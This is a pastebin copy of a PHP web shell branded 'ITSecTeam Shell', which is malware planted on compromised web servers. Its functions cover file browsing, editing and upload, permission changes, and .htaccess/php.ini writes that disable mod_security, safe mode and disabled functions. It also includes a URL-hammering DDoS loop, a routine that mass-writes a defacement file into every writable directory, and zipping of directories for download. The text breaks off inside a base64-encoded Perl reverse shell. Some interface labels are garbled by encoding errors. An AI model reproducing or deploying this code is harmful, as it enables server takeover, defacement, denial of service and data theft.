· 6 years ago · Sep 25, 2019, 11:04 AM
1<?php
2session_start();
3set_time_limit(0);
4error_reporting(0);
5if (get_magic_quotes_gpc()) {
6function stripslashes_deep($value) {
7 $value = is_array($value) ?
8 array_map('stripslashes_deep', $value) :
9 stripslashes($value);
10
11 return $value;
12 }
13$_POST = array_map('stripslashes_deep', $_POST);
14$_GET = array_map('stripslashes_deep', $_GET);
15$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
16$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
17}
18if($_GET['do']=="remove"){
19unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
20}
21$basep=$_SERVER['DOCUMENT_ROOT'];
22if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
23$slash="\\";
24$basep=str_replace("/","\\",$basep);
25}else{
26$slash="/";
27$basep=str_replace("\\","/",$basep);
28}
29if($_GET['do']=="remove"){
30unlink(getcwd().$slash.$_SERVER["SCRIPT_NAME"]);
31}
32if ($_REQUEST['address']){
33if(is_readable($_REQUEST['address'])){
34chdir($_REQUEST['address']);}else{
35alert("Permission Denied !");}}
36$me=$_SERVER['PHP_SELF'];
37$formp="<form method=post action='".$me."'>";
38$formg="<form method=get action='".$me."'>";
39$nowaddress='<input type=hidden name=address value="'.getcwd().'">';
40if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
41 if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){
42 alert("File Upload Successful");
43 }else{
44alert("Permission Denied !");
45
46 }
47 }
48if(ini_get('disable_functions')){
49$disablef=ini_get('disable_functions');
50}else{
51$disablef="All Functions Enable";
52}
53if(ini_get('safe_mode')){
54$safe_modes="On";
55}else{
56$safe_modes="Off";
57}
58if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
59if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");}
60}
61$picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=';
62$picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC';
63$head='<style type="text/css">
64A:link {text-decoration: none}
65A:visited {text-decoration: none}
66A:active {text-decoration: none}
67A:hover {text-decoration: underline overline; color: 414141;}
68.focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
69</style><head>
70<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
71<title>iTSecTeam</title>
72</head><body topmargin="0" leftmargin="0" rightmargin="0"
73bgcolor="#f2f2f2"><div align="center">
74 <table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
75<tr>
76<td height="30" width="996">
77<p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=��ҳ">��ҳ</a> -- <a href="?do=filemanager&address='.getcwd().'">�ļ�����</a> -- <a href="?do=cmd&address='.getcwd().'">����ִ��</a> -- <a href="?do=bc&address='.getcwd().'">����shell</a> --
78<a href="?do=bypasscmd&address='.getcwd().'">BypasS ����ִ��(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
79<a href="?do=bypassdir&address='.getcwd().'">�ƹ����ƶ��ļ�</a> -- <a href="?do=eval&address='.getcwd().'">
80PHP����</a> -- <a href="?do=db&address='.getcwd().'">���ݿ����</a> -- <a href="?do=����ת��&address='.getcwd().'">����ת��</a> -- <a href="?do=mail&address='.getcwd().'">�ʼ�ʹ��</a><a href="?do=info&address='.getcwd().'">
81<br>��������Ϣ</a> -- <a href="?do=d0slocal&address='.getcwd().'">��������</a> -- <a href="?do=dump&address='.getcwd().'">�������ݿ�</a> -- <a href="?do=mass&address='.getcwd().'">��������</a> -- <a href="?do=dlfile&address='.getcwd().'">�����ļ�</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">���дĿ¼</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
82</span></font></td></tr></table></div>
83<div align="center">
84<table id="table2" style="border-collapse: collapse; border-style:
85solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
86cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px;
87border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
88height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
89Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);"
90width="950" bgcolor="#e7e3de" height="10" valign="top">';
91$end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
92$deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
93function alert($text){
94echo "<script>alert('".$text."')</script>";
95}
96if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
97if(is_readable($_GET['address'].$_GET['filename'])){
98$opedit=fopen($_GET['address'].$_GET['filename'],"r");
99while(!feof($opedit))
100$data.=fread($opedit,9999);
101fclose($opedit);
102echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET['filename'].' name=namefe><br><input type=submit value=" Save "></form></p>'.$end;exit;
103}else{alert("Permission Denied !");}}
104function sizee($size)
105{
106 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
107 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
108 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
109 else {$size = $size . " B";}
110 return $size;
111}
112if($_REQUEST['do']=='about'){
113echo $head."<p align='center'><b><font color=red>ITSecTeam, IT Security Research & Penetration Testing Team</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Coded By : Amin Shokohi(Pejvak)<br>Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )<br>��ҳ Page : <a href='http://www.itsecteam.com'>http://www.itsecteam.com</a><br>Update Notice: <a href='http://itsecteam.com/en/tools/itsecteam_shell.htm'>ITSecTeam Shell</a><br>Forum : <a href='http://www.forum.itsecteam.com'>http://www.forum.itsecteam.com</a><br>
114<center>
115<PRE>
116
117 ______ ______ ____ ______
118/\__ _\/\__ _\/\ _`\ /\__ _\
119\/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___
120 \ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\
121 \_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \
122 /\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
123 \/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/
124
125
126
127
128
129
130</PRE>
131
132
133".$end;exit;
134
135}
136function deleteDirectory($dir) {
137if (!file_exists($dir)) return true;
138if (!is_dir($dir) || is_link($dir)) return unlink($dir);
139foreach (scandir($dir) as $item) {
140if ($item == '.' || $item == '..') continue;
141if (!deleteDirectory($dir . "/" . $item)) {
142chmod($dir . "/" . $item, 0777);
143if (!deleteDirectory($dir . "/" . $item)) return false;
144};}return rmdir($dir);}
145
146function download($fileadd,$finame){
147$dlfilea=$fileadd.$finame;
148header("Content-Disposition: attachment; filename=" . $finame);
149header("Content-Type: application/download");
150header("Content-Length: " . filesize($dlfilea));
151flush();
152$fp = fopen($$dlfilea, "r");
153while (!feof($fp))
154{
155 echo fread($fp, 65536);
156 flush();
157}
158fclose($fp);
159}
160if($_GET['do']=="rename"){
161echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value=" Save "></form></p>'.$end;exit;
162}
163
164if ($_GET['byapache']=='ofms'){
165$fse=fopen(getcwd().$slash.".htaccess","w");
166fwrite($fse,'<IfModule mod_security.c>
167 Sec------Engine Off
168 Sec------ScanPOST Off
169</IfModule>');
170fclose($fse);
171}elseif ($_GET['byapache']=='bysap'){
172$fse=fopen(getcwd().$slash.".htaccess","w");
173fwrite($fse,'Options +FollowSymLinks
174DirectoryIndex Persian-Gulf-For-Ever.html');
175fclose($fse);
176}elseif ($_GET['byapache']=='sfadf'){
177$fse=fopen(getcwd().$slash."php.ini","w");
178fwrite($fse,'safe_mode=OFF
179disable_functions=NONE');
180fclose($fse);
181}
182if($_GET['do']=="apache"){
183echo $head.$formg.$nowaddress.'<p align="center">
184<select name=byapache>
185<option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
186<option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
187</select><br><input type=submit value=eXecute></form></p>'.$end;exit;
188}
189if($_GET['do']=="dd0s"){
190echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value=" DDoS "></form></p>'.$end;exit;
191}
192
193if($_GET['urldd0'] && $_GET['timedd0']){
194for ($id=0;$$id<$_GET['timedd0'];$id++){
195$fp=null;
196$contents=null;
197$fp=fopen($_GET['urldd0'],"rb");
198while (!feof($fp)) {
199 $contents .= fread($fp, 8192);
200}
201fclose($fp);
202}}
203if($_GET['do']=="dlfile"){
204echo $head.$formp.$nowaddress.'<p align="center">�����ļ�!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value=" Download "></form></p>'.$end;exit;
205}
206function dirpe($addres){
207global $slash;
208$idd=0;
209if ($dirhen = @opendir($addres)) {
210while ($file = readdir($dirhen)) {
211$permdir=str_replace('//','/',$addres.$slash.$file);
212if($file!='.' && $file!='..' && is_dir($permdir)){
213if (is_writable($permdir)) {
214$dirdata[$idd]['filename']=$permdir;
215$idd++;
216}
217dirpe($permdir);
218 }
219 }
220 closedir($dirhen);
221 } else {
222 return ("notperm");
223 }
224 if ($dirdata){
225 return $dirdata;
226 }else{
227 return "notfound";
228
229 }
230}
231function dirpmass($addres,$massname,$masssource){
232global $slash;
233$idd=0;
234if ($dirhen = @opendir($addres)) {
235while ($file = readdir($dirhen)) {
236$permdir=str_replace('//','/',$addres.$slash.$file);
237if($file!='.' && $file!='..' && is_dir($permdir)){
238if (is_writable($permdir)) {
239if ($fm=fopen($permdir.$slash.$massname,"w")){
240fwrite($fm,$masssource);
241fclose($fm);
242$dirdata[$idd]['filename']=$permdir;
243}
244
245$idd++;
246}
247dirpmass($permdir);
248 }
249 }
250 closedir($dirhen);
251 } else {
252 return ("notperm");
253 }
254 if ($dirdata){
255 return $dirdata;
256 }else{
257 return "notfound";
258
259 }
260}
261if($_GET['do']=="perm"){
262echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value=" Search "></form></p>'.$end;exit;
263}
264if ($_POST['affw']){
265$arrfilelist=dirpe($_POST['affw']);
266if ($arrfilelist=='notfound'){
267alert("Not Found !");
268}elseif($arrfilelist=='notperm'){
269alert("Permission Denied !");
270}else{
271foreach ($arrfilelist as $tmpdir){
272 if ($coi %2){
273$colort='"#e7e3de"';
274}else{
275$colort='"#e4e1de"';}
276$coi++;
277$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
278<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
279<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
280<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
281}
282echo $head.'
283<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
284<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
285</tr></table>'.$permdir.'</table>
286<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
287<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
288<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
289<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
290<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
291<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
292<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
293<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
294<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
295<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
296<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
297<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
298<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
299<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
300<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
301<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
302<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
303<font face="Tahoma" style="font-size: 10pt">
304<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
305<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
306<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
307<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
308<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
309<td width="200" align="right" valign="top">
310<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
311<td width="750"><font face="Tahoma" style="font-size: 10pt">
312<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
313}}
314if($_GET['do']=="mass"){
315echo $head.$formp.'<p align="center">[��������]<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value=" Mass "></form></p>'.$end;exit;
316}
317if ($_POST['mffw']){
318$arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']);
319if ($arrfilelist=='notfound'){
320alert("Not Found !");
321}elseif($arrfilelist=='notperm'){
322alert("Permission Denied !");
323}else{
324foreach ($arrfilelist as $tmpdir){
325 if ($coi %2){
326$colort='"#e7e3de"';
327}else{
328$colort='"#e4e1de"';}
329$coi++;
330$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
331<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
332<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
333<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
334}
335echo $head.'
336<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
337<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
338</tr></table>'.$permdir.'</table>
339<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
340<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
341<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
342<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
343<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
344<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
345<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
346<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
347<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
348<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
349<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
350<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
351<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
352<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
353<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
354<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
355<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
356<font face="Tahoma" style="font-size: 10pt">
357<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
358<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
359<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
360<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
361<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
362<td width="200" align="right" valign="top">
363<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
364<td width="750"><font face="Tahoma" style="font-size: 10pt">
365<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
366}}
367if($_POST['adlr'] && $_POST['adsr']){
368$url = $_POST['adlr'];
369$newfname = $_POST['adsr'] . basename($url);
370$file = fopen ($url, "rb");
371if ($file) {
372 $newf = fopen ($newfname, "wb");
373 if ($newf)
374 while(!feof($file)) {
375 fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
376 }
377 alert("File Downloaded Success");
378}else{alert("Can Not Open File");}
379if ($file) {
380 fclose($file);
381}
382if ($newf) {
383 fclose($newf);
384}
385}
386if($_GET['do']=="down" and $_GET['type']=='file'){
387download($_GET['address'],$_GET['filename']);}
388if($_GET['do']=="down" and $_GET['type']=='dir'){
389class zipfile
390{
391var $datasec = array();
392var $ctrl_dir = array();
393var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
394var $old_offset = 0;
395function add_dir($name)
396{
397$name = str_replace("\\", "/", $name);
398$fr = "\x50\x4b\x03\x04";
399$fr .= "\x0a\x00";
400$fr .= "\x00\x00";
401$fr .= "\x00\x00";
402$fr .= "\x00\x00\x00\x00";
403$fr .= pack("V",0);
404$fr .= pack("V",0);
405$fr .= pack("V",0);
406$fr .= pack("v", strlen($name) );
407$fr .= pack("v", 0 );
408$fr .= $name;
409$fr .= pack("V",$crc);
410$fr .= pack("V",$c_len);
411$fr .= pack("V",$unc_len);
412$this -> datasec[] = $fr;
413$new_offset = strlen(implode("", $this->datasec));
414$cdrec = "\x50\x4b\x01\x02";
415$cdrec .="\x00\x00";
416$cdrec .="\x0a\x00";
417$cdrec .="\x00\x00";
418$cdrec .="\x00\x00";
419$cdrec .="\x00\x00\x00\x00";
420$cdrec .= pack("V",0);
421$cdrec .= pack("V",0);
422$cdrec .= pack("V",0);
423$cdrec .= pack("v", strlen($name) );
424$cdrec .= pack("v", 0 );
425$cdrec .= pack("v", 0 );
426$cdrec .= pack("v", 0 );
427$cdrec .= pack("v", 0 );
428$ext = "\x00\x00\x10\x00";
429$ext = "\xff\xff\xff\xff";
430$cdrec .= pack("V", 16 );
431$cdrec .= pack("V", $this -> old_offset );
432$this -> old_offset = $new_offset;
433$cdrec .= $name;
434$this -> ctrl_dir[] = $cdrec;
435}
436function add_file($data, $name)
437{
438$name = str_replace("\\", "/", $name);
439$fr = "\x50\x4b\x03\x04";
440$fr .= "\x14\x00";
441$fr .= "\x00\x00";
442$fr .= "\x08\x00";
443$fr .= "\x00\x00\x00\x00";
444$unc_len = strlen($data);
445$crc = crc32($data);
446$zdata = gzcompress($data);
447$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
448$c_len = strlen($zdata);
449$fr .= pack("V",$crc);
450$fr .= pack("V",$c_len);
451$fr .= pack("V",$unc_len);
452$fr .= pack("v", strlen($name) );
453$fr .= pack("v", 0 );
454$fr .= $name;
455$fr .= $zdata;
456$fr .= pack("V",$crc);
457$fr .= pack("V",$c_len);
458$fr .= pack("V",$unc_len);
459$this -> datasec[] = $fr;
460$new_offset = strlen(implode("", $this->datasec));
461$cdrec = "\x50\x4b\x01\x02";
462$cdrec .="\x00\x00";
463$cdrec .="\x14\x00";
464$cdrec .="\x00\x00";
465$cdrec .="\x08\x00";
466$cdrec .="\x00\x00\x00\x00";
467$cdrec .= pack("V",$crc);
468$cdrec .= pack("V",$c_len);
469$cdrec .= pack("V",$unc_len);
470$cdrec .= pack("v", strlen($name) );
471$cdrec .= pack("v", 0 );
472$cdrec .= pack("v", 0 );
473$cdrec .= pack("v", 0 );
474$cdrec .= pack("v", 0 );
475$cdrec .= pack("V", 32 );
476$cdrec .= pack("V", $this -> old_offset );
477$this -> old_offset = $new_offset;
478$cdrec .= $name;
479$this -> ctrl_dir[] = $cdrec;
480}
481function file() {
482$data = implode("", $this -> datasec);
483$ctrldir = implode("", $this -> ctrl_dir);
484return
485$data.
486$ctrldir.
487$this -> eof_ctrl_dir.
488pack("v", sizeof($this -> ctrl_dir)).
489pack("v", sizeof($this -> ctrl_dir)).
490pack("V", strlen($ctrldir)).
491pack("V", strlen($data)).
492"\x00\x00";
493}
494}
495$dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash;
496$zipfile = new zipfile();
497function get_files_from_folder($directory, $put_into) {
498global $zipfile;
499if ($handle = opendir($directory)) {
500while (false !== ($file = readdir($handle))) {
501if (is_file($directory.$file)) {
502$fileContents = file_get_contents($directory.$file);
503$zipfile->add_file($fileContents, $put_into.$file);
504} elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
505$zipfile->add_dir($put_into.$file.'/');
506get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
507}
508}
509}
510closedir($handle);
511}
512$datedl=date("y-m-d");
513get_files_from_folder($dlfolder,'');
514header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip");
515header("Content-Type: application/download");
516header("Content-Length: " . strlen($zipfile -> file()));
517flush();
518echo $zipfile -> file();
519$filename = $_GET['dirname']."-".$datedl.".zip";
520$fd = fopen ($filename, "wb");
521$out = fwrite ($fd, $zipfile -> file());
522fclose ($fd);
523}
524if ($_REQUEST['cdirname']){
525if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
526function bcn($ipbc,$pbc){
527$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
528NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
529MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
530dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
531IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
532YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
533LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
534KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
535KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
